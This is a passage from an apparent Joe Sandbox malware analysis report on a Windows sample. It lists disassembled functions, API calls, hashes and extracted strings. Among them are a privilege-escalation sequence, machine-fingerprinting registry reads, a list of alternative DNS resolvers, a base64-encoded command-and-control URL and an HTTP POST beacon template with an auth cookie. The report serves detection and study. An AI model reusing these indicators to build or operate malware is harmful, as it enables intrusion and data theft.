                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,?,?,?,?,?,?,004055BE,?,?,00000000), ref: 00407510
                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00407543
                                                                                                                                                                                                                                                                                              • Part of subcall function 00401038: CloseHandle.KERNELBASE(?,?,0040754D,00000000), ref: 0040104C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AdjustCloseHandleLibraryLoadLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                            • API String ID: 2554602356-2896544425
                                                                                                                                                                                                                                                                                            • Opcode ID: 01756253d6279bc06532bc359191b9fb583836657e85989d576cd599f160dac0
                                                                                                                                                                                                                                                                                            • Instruction ID: 6e7a77d222d5dae45ddfc479b8958933faf07da482d68d81a335310f6622e393
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01756253d6279bc06532bc359191b9fb583836657e85989d576cd599f160dac0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C901A176D00219BAEB24ABA5CC06FBF7B78DB84B14F10002EF611B61C0DEB45A42C7A4
                                                                                                                                                                                                                                                                                            Function 0040655C Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: e0afde4e7ea80f25c680adb9b258e1b8e79db88d3a9e5cb29347fda3f797a3d9
                                                                                                                                                                                                                                                                                            • Instruction ID: 27da8c1ec72761822c282df4f746b889bebbbd9ed263afda7f066945e698630e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0afde4e7ea80f25c680adb9b258e1b8e79db88d3a9e5cb29347fda3f797a3d9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4301DB72200119BADF219F76EC84CAB3B9CDFC47A4B12403BF90ADA194DE34CA51C764
                                                                                                                                                                                                                                                                                            Function 00406EFB Relevance: 29.8, APIs: 1, Strings: 16, Instructions: 85libraryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 36 406efb-406f06 37 406f0c 36->37 38 406f8d-406f8f 36->38 39 406f60-406f65 37->39 40 406f21-406f26 37->40 41 406f44-406f49 37->41 42 406f67-406f6c 37->42 43 406f28-406f2d 37->43 44 406f4b-406f50 37->44 45 406f6e-406f73 37->45 46 406f2f-406f34 37->46 47 406f52-406f57 37->47 48 406f13-406f18 37->48 49 406f75-406f7a 37->49 50 406f36-406f3b 37->50 51 406f59-406f5e 37->51 52 406f1a-406f1f 37->52 53 406f7c 37->53 54 406f3d-406f42 37->54 55 406fde-406fe0 38->55 56 406f81-406f8b LoadLibraryW 39->56 40->56 41->56 42->56 43->56 44->56 45->56 46->56 47->56 48->56 49->56 50->56 51->56 52->56 53->56 54->56 56->38 57 406f91-406fb8 56->57 58 406fbd-406fcd call 406eca 57->58 61 406fe1-406ff3 58->61 62 406fcf-406fd8 58->62 65 406fdc-406fdd 61->65 63 406fba 62->63 64 406fda 62->64 63->58 64->65 65->55
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                            • String ID: advapi32.dll$crypt32.dll$dnsapi.dll$kernel32.dll$msvcrt.dll$nspr4.dll$nss3.dll$ntdll.dll$ole32.dll$psapi.dll$shell32.dll$shlwapi.dll$user32.dll$wininet.dll$ws2_32.dll$xul.dll
                                                                                                                                                                                                                                                                                            • API String ID: 1029625771-4097605785
                                                                                                                                                                                                                                                                                            • Opcode ID: b05cdc3783718204fb3b4be6137daa9054297c803891c43341a82129f0edb6f1
                                                                                                                                                                                                                                                                                            • Instruction ID: f657154772c80f87e448980a5ca515e2e2bcc5c52bfdccd5b73551a91bb51776
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b05cdc3783718204fb3b4be6137daa9054297c803891c43341a82129f0edb6f1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5213434B48217EFCB10DF58E8D1A7973A4AA0470473243B7AC07B22C1DA7DA923965E
                                                                                                                                                                                                                                                                                            Function 004082B1 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 92networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408248: DnsQuery_A.DNSAPI(00000000,00000001,00000100,00000000,00000000,00000000,?,?,0040833E,0040C698,00000000,00000104,00000000,00000000,00000000), ref: 0040826C
                                                                                                                                                                                                                                                                                            • DnsQuery_A.DNSAPI(?,00000001,00000048,00000001,?,00000000,00000000,00000000,00000000), ref: 00408383
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Query_$AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID: 8.8.4.4$8.8.8.8$alors.deepdns.cryptostorm.net$anyone.dnsrec.meo.ws$civet.ziphaze.com$ist.fellig.org$ns.dotbit.me$ns1.any.dns.d0wn.biz$ns1.nl.dns.d0wn.biz$ns1.random.dns.d0wn.biz$ns1.sg.dns.d0wn.biz$ns2.fr.dns.d0wn.biz$ns2.random.dns.d0wn.biz$onyx.deepdns.cryptostorm.net
                                                                                                                                                                                                                                                                                            • API String ID: 1456340079-1306401760
                                                                                                                                                                                                                                                                                            • Opcode ID: 8ae600da997019b12e885ff345ab86a939921d59ce991e6e7073f847662ee345
                                                                                                                                                                                                                                                                                            • Instruction ID: c9084613bda45e1e74c3bb461d827bd270bf68cfc2f17d1f5d5ae0dfdf99d2f2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ae600da997019b12e885ff345ab86a939921d59ce991e6e7073f847662ee345
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C831A0B5901209EFDB10DF95D985AEDBBB4EF84718F10853EE640BB2C0CBB94A458F58
                                                                                                                                                                                                                                                                                            Function 00402174 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 89 402174-4021e9 __p__commode call 4022f3 94 4021f7-40224e call 4022de _initterm __getmainargs _initterm 89->94 95 4021eb-4021f6 __setusermatherr 89->95 98 402250-402258 94->98 99 40228a-40228d 94->99 95->94 100 40225a-40225c 98->100 101 40225e-402261 98->101 102 402267-40226b 99->102 103 40228f-402293 99->103 100->98 100->101 101->102 104 402263-402264 101->104 105 402271-402282 GetStartupInfoA 102->105 106 40226d-40226f 102->106 103->99 104->102 107 402284-402288 105->107 108 402295-402297 105->108 106->104 106->105 109 402298-4022a3 GetModuleHandleA call 40557e 107->109 108->109 111 4022a8-4022c5 exit _XcptFilter 109->111
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                                                                                                                                                            • String ID: @uvp]v
                                                                                                                                                                                                                                                                                            • API String ID: 801014965-873339645
                                                                                                                                                                                                                                                                                            • Opcode ID: b281988938781d67bf15387f0b1d5ee4fa9c5b3fd02b09e97799dea494b35ddc
                                                                                                                                                                                                                                                                                            • Instruction ID: f02d1b6466a299adb27a5e270f0a6a85593d2540db13fc2fa04fa029bfc30e9d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b281988938781d67bf15387f0b1d5ee4fa9c5b3fd02b09e97799dea494b35ddc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 544180B1801214EFDB209FE4DA8DAA97BB8FB09710F20467FE441B72D1C7B84941DB59
                                                                                                                                                                                                                                                                                            Function 00407D09 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 124stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00407D39
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00407D50
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: GetCurrentThread.KERNEL32 ref: 004078EF
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: OpenThreadToken.ADVAPI32(00000000), ref: 004078F6
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: GetLastError.KERNEL32 ref: 00407900
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: GetCurrentProcess.KERNEL32(00000008,?), ref: 00407917
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: OpenProcessToken.ADVAPI32(00000000), ref: 0040791E
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 0040793A
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: GetLastError.KERNEL32 ref: 00407940
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00407967
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 00407980
                                                                                                                                                                                                                                                                                              • Part of subcall function 004078D2: CloseHandle.KERNELBASE(?), ref: 0040799A
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00407D82
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00407DC1
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00407DED
                                                                                                                                                                                                                                                                                              • Part of subcall function 004064D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00407DFB,000000FF,00000000,00000000,00000000,00000000,753C73E0,00000206,00000000,?,?,00407DFB,?), ref: 004064E9
                                                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 00407E03
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00407E28
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00407E3C
                                                                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 00407E4F
                                                                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 00407E7B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset$Token$CurrentErrorInformationLastOpenProcessThreadwcscpywsprintf$AccountByteCharCloseHandleLookupMultiWidestrlen
                                                                                                                                                                                                                                                                                            • String ID: %ls : %ls : %ls
                                                                                                                                                                                                                                                                                            • API String ID: 177936384-2957079723
                                                                                                                                                                                                                                                                                            • Opcode ID: babddac712cad19a0d7f26c6013cac7cc94ce63be575d8b99abbf3eab72173e6
                                                                                                                                                                                                                                                                                            • Instruction ID: 76b522d247ba1cef427f0a02b01398071b68e474c0fa3506349a2e9bce56e1da
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: babddac712cad19a0d7f26c6013cac7cc94ce63be575d8b99abbf3eab72173e6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46410AB2D0111CAADB11ABA1CD89DEFB7BCAF48314F0041B7B505F2151EA389F548FA9
                                                                                                                                                                                                                                                                                            Function 00408D7E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 130libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,76EAA830,aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=,0040C8B0,?,?,?,?,?,?,00407F38,00000000,enter,00000000), ref: 00408D97
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,sprintf), ref: 00408DAE
                                                                                                                                                                                                                                                                                            • wcslen.MSVCRT ref: 00408E1A
                                                                                                                                                                                                                                                                                            • wcslen.MSVCRT ref: 00408E2D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • sprintf, xrefs: 00408DA8
                                                                                                                                                                                                                                                                                            • _wv=%ls, xrefs: 00408E3C
                                                                                                                                                                                                                                                                                            • aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=, xrefs: 00408D85
                                                                                                                                                                                                                                                                                            • POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s, xrefs: 00408E5D
                                                                                                                                                                                                                                                                                            • ntdll.dll, xrefs: 00408D89
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: wcslen$AddressHandleModuleProc
                                                                                                                                                                                                                                                                                            • String ID: POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s$_wv=%ls$aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=$ntdll.dll$sprintf
                                                                                                                                                                                                                                                                                            • API String ID: 2336636556-2706753241
                                                                                                                                                                                                                                                                                            • Opcode ID: cc94d6b67bd7c634288db6eaa589f14044f8ad9a1c3efea9667d72259c3ff468
                                                                                                                                                                                                                                                                                            • Instruction ID: df0ed00883dc8d85c0ee36307988c8dba98f72120727b95dcb06ce5e2765d488
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc94d6b67bd7c634288db6eaa589f14044f8ad9a1c3efea9667d72259c3ff468
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF41CCB1D00218BEEF056BE1DD4AAAF7B78EF44714F10416FF900B61C1DB795A448BA8
                                                                                                                                                                                                                                                                                            Function 004078D2 Relevance: 15.1, APIs: 10, Instructions: 86threadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 183 4078d2-4078fe GetCurrentThread OpenThreadToken 184 407900-40790b GetLastError 183->184 185 407928-40793e GetTokenInformation 183->185 186 407911-407926 GetCurrentProcess OpenProcessToken 184->186 187 407992-407995 184->187 188 407940-407949 GetLastError 185->188 189 407991 185->189 186->185 186->187 190 4079a0-4079a2 187->190 191 407997-40799a CloseHandle 187->191 188->189 192 40794b-407958 call 404c49 188->192 189->187 193 4079a4-4079a5 call 404c38 190->193 194 4079ab-4079b1 190->194 191->190 192->189 199 40795a-40796b GetTokenInformation 192->199 198 4079aa 193->198 198->194 199->189 200 40796d-407988 LookupAccountSidW 199->200 200->189 201 40798a 200->201 201->189
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 004078EF
                                                                                                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 004078F6
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00407900
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 00407917
                                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040791E
                                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 0040793A
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00407940
                                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00407967
                                                                                                                                                                                                                                                                                            • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 00407980
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 0040799A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Token$CurrentErrorInformationLastOpenProcessThread$AccountCloseHandleLookup
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4175233327-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 223df96bc05a8bfedb15175d6f92cefc4116d2cb6c70b561b553ae38f2bd0538
                                                                                                                                                                                                                                                                                            • Instruction ID: 609ed7c15d32b6034a4c8f4bf665a9d089410b99d4fc1c170885cd96a357999d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 223df96bc05a8bfedb15175d6f92cefc4116d2cb6c70b561b553ae38f2bd0538
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 632128B1904109FBEF219FEADD84AAFBBB9FB44704F104166F600F2191D7399A40DB69
                                                                                                                                                                                                                                                                                            Function 004097B9 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 335COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 202 4097b9-40998d call 404c49 wsprintfW call 408d7e call 404c38 memset * 2 call 404c49 call 402b53 call 404b15 * 2 call 40974a 219 409993-409996 202->219 220 409b8a-409ba1 call 404c38 _endthreadex 202->220 219->220 222 40999c-4099a4 219->222 222->220 224 4099aa-4099ba call 402c47 222->224 227 4099c0-4099ca call 402c68 224->227 228 409b7a-409b84 224->228 227->228 231 4099d0-4099d9 call 4085b3 227->231 228->220 228->224 231->228 234 4099df-4099e8 call 402b0a 231->234 234->228 237 4099ee-4099f7 call 408545 234->237 237->228 240 4099fd-409a13 call 402bdd 237->240 243 409a15-409a1b 240->243 244 409a37-409a70 call 402c68 call 404b15 240->244 246 409a1e-409a35 call 402bdd 243->246 252 409a72-409a87 244->252 253 409a89-409a93 244->253 246->244 252->253 254 409a95 253->254 255 409a9b-409aad call 40627b 253->255 254->255 258 409b21-409b26 255->258 259 409aaf 255->259 260 409b28-409b2d 258->260 261 409b6e-409b74 call 408482 258->261 262 409ab1-409ab6 259->262 263 409b0c-409b0f 259->263 266 409b64-409b6c 260->266 267 409b2f-409b34 260->267 270 409b79 261->270 268 409b02-409b0a 262->268 269 409ab8-409abd 262->269 265 409b14-409b1f _beginthreadex 263->265 265->228 266->265 271 409b36-409b3b 267->271 272 409b5a-409b62 267->272 268->265 273 409af8-409b00 269->273 274 409abf-409ac4 269->274 270->228 275 409b50-409b58 271->275 276 409b3d-409b42 271->276 272->265 273->265 277 409ac6-409acb 274->277 278 409aee-409af6 274->278 275->265 276->228 281 409b44-409b4e 276->281 279 409ae4-409aec 277->279 280 409acd-409ad2 277->280 278->265 279->265 280->228 282 409ad8-409ae2 280->282 281->265 282->265
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004098EA
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408D7E: GetModuleHandleW.KERNEL32(ntdll.dll,76EAA830,aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=,0040C8B0,?,?,?,?,?,?,00407F38,00000000,enter,00000000), ref: 00408D97
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040991E
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00409935
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 00409B94
                                                                                                                                                                                                                                                                                              • Part of subcall function 004085B3: memset.MSVCRT ref: 004085DF
                                                                                                                                                                                                                                                                                              • Part of subcall function 004085B3: RegOpenKeyExA.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00000001,?,?,?,?,00000000), ref: 00408605
                                                                                                                                                                                                                                                                                              • Part of subcall function 004085B3: RegQueryValueExA.KERNELBASE(?,00000104,00000000,?,00000000,00000104,?,?,?,00000000), ref: 00408631
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408545: Sleep.KERNELBASE(0000000A,?,00000000,?,?,?,004099F4), ref: 00408572
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408545: RegSetValueExA.KERNELBASE(00000000,004099F4,00000000,00000001,0040D10C,00000000,?,?,004099F4), ref: 0040859D
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 00409B16
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset$Value$AllocHandleModuleOpenQuerySleepVirtual_beginthreadex_endthreadexwsprintf
                                                                                                                                                                                                                                                                                            • String ID: 5.1$NONE$\S
                                                                                                                                                                                                                                                                                            • API String ID: 3580284329-1620626971
                                                                                                                                                                                                                                                                                            • Opcode ID: 70db6fbd4819d20750c55d5daf8ded0cd093b88732e01a00c4987eab7d4a68c2
                                                                                                                                                                                                                                                                                            • Instruction ID: 6f4def9776e3144b4e91abccb01f71e6dadc73255ed4a105e5b1a4fa84ed437c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70db6fbd4819d20750c55d5daf8ded0cd093b88732e01a00c4987eab7d4a68c2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03B1C671900214A6CB20DBA59885DEFBBB9FF95360F25403BF408F7291EA785D41C7AE
                                                                                                                                                                                                                                                                                            Function 00407EB8 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: wcstok$wcscpywcslen
                                                                                                                                                                                                                                                                                            • String ID: aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=$enter$success
                                                                                                                                                                                                                                                                                            • API String ID: 167661103-1147737276
                                                                                                                                                                                                                                                                                            • Opcode ID: 92f076d9bee80c38dce688214b59da554e15b5bf1f6aeb1616af7e9711dd9330
                                                                                                                                                                                                                                                                                            • Instruction ID: 5e2ea09061ae17bc0837542cf5ed6214d01f139d59b08546becc52b18c271b2c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92f076d9bee80c38dce688214b59da554e15b5bf1f6aeb1616af7e9711dd9330
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E316071D08209ABDF04BBA1DD46A9EBBB8EF40318F11407FF440762D2DB795E158B99
                                                                                                                                                                                                                                                                                            Function 004079B2 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040740F: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,004079E1,8EB39475,?), ref: 00407421
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040740F: GetProcAddress.KERNEL32(00000000), ref: 00407428
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040740F: IsWow64Process.KERNEL32(00000000,00000000,?,?,004079E1,8EB39475,?), ref: 0040744C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,?,00000000,?,?,?), ref: 00407A14
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,00000050), ref: 00407A41
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
